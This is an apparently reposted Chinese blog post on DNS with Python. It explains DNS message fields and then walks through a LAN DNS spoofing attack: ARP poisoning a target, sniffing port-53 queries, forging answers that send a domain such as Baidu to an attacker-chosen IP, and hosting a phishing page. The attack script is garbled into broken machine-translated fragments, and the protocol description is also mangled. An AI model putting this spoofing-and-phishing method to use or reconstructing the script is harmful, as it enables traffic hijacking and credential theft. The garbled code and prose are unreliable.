dns python,修改dns违法吗
DNS
DNS(域名系统)是互联网的一项服务。作为一个域名和IP地址相互映射的分布式数据库,访问互联网很方便。使用DNS TCP和UDP端口53。目前各级域名长度限制在63个字符以内,域名总长度不能超过253个字符。
DNS协议
DNS是一种域名解析协议,用于将域名转换为IP地址。
DNS协议报文格式
session IDentifier:DNS报文的id标识,其中该字段对于请求报文及其对应的响应报文是相同的,这样可以区分出DNS响应报文是哪个请求。
徽标:
QR (1位)查询/响应标志,0为查询,1为响应操作码)4位)0为标准查询,1为反向查询,2为服务器状态请求aa) 1位(批准回复TC) 1位)被截断rd) 1位问题,回答RRs,权限RRs,附加RRs分别表示最后4个区域的编号。问题表示查询问题区域部分的数量,答案表示答案区域的数量,权威名称用户表示批准区域的数量,附加记录表示附加区域的数量。
DNS欺骗原理
如果伪装成域名服务器,或者修改dns响应包的分析结果,替换成攻击者的IP地址,就意味着指向攻击者的IP地址。通过将钓鱼页面放入apache或nignx进行部署,可以修改指向钓鱼服务器的IP和端口进行钓鱼。
DNS欺骗实现
首先,欺骗将构造好的ARP回复数据包发送到目标设备。当ARP欺骗成功后,会监听端口53的dns报文,过滤目标ip地址的dns报文,得到请求报文,并修改源端口和目标端口的一些参数生成响应报文,修改anwser报文中的分析结果,转换成攻击目标地址发送给受害者。
代码实现
#!/usr/zydlc/env python #-coding:utf-8-* # @ file:DNS _ attack . py # @ author:feng # @ date 33602000 DNS packet=IP(/UDP)/DNS)ID,qr,opcode,rd,Qd=dnsqr)qnnammar verbose=false)ID表示匹配请求和响应qr 0表示查询消息opcode 0,标准查询rd 1表示递归defDNS_spoof(data) :try:#表示IP _ fields=data.getlayerUDP _ fields=data . get layer(UDP)fields # DNS _ fields=data . get layer。qd.qnameprint(str(req_domain))。split()[1])print(str)data)[IP]。split))(数据)652打印。src)=(192 . 168 . 31 . 135)3360(if src))192 . 168 . 168 3360 printing(str(req _ domain)del)data[IP]。len)(Dell))data)IP)652 RES . fc field=2 RES . dst=data . dst,data.src res[IP]。src,RES [ data data.sport RES [ DNS ]。QR=1RES [ DNS ]。ra=1RES [ DNS ]。an count=1RES [ DNS ]。an=DNS RR(RR name=req _ DOD)sendp(RES)Else:print(except例外:print(e)def DNS _ s))652 filtered DNS packet=IP(/UDP)/DNS)id,qr,opcode,rd,qd=DNSQR) qnname=DNS_name),verbose=false。
Iface参数:指的是您的无线网卡的名称。目标设备是192.168.31.135,本地设备是192.168.31.225,网关是192.168.31.1,分析结果是220.220。
然后进行dns欺诈攻击。
匹配百度的结果被打印出来,wireshark也捕获icmp ping数据包。arp攻击不再响应攻击者的流量,后期形成向目标主机转发流量包的循环。
攻击结果显示后,百度解析为设定结果。
ERRORS Team ERRORS Team由网络安全爱好者联合成立,致力于从网络安全的各个方面维护国家网络安全。团队成员具备专业的渗透测试技术、安全评估能力、逆向分析技术和丰富的专业技能。这个团队是一个年轻而充满活力的团队,旨在通过知识分享和技术探讨,提高网络安全意识和专业知识。
加入我们:
错误团队主页:https://www.sentrylab.cn/
团队申请:3359 www . vul box.com/team/errors
或通过邮件联系:chihou.pro@gmail.com。
郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。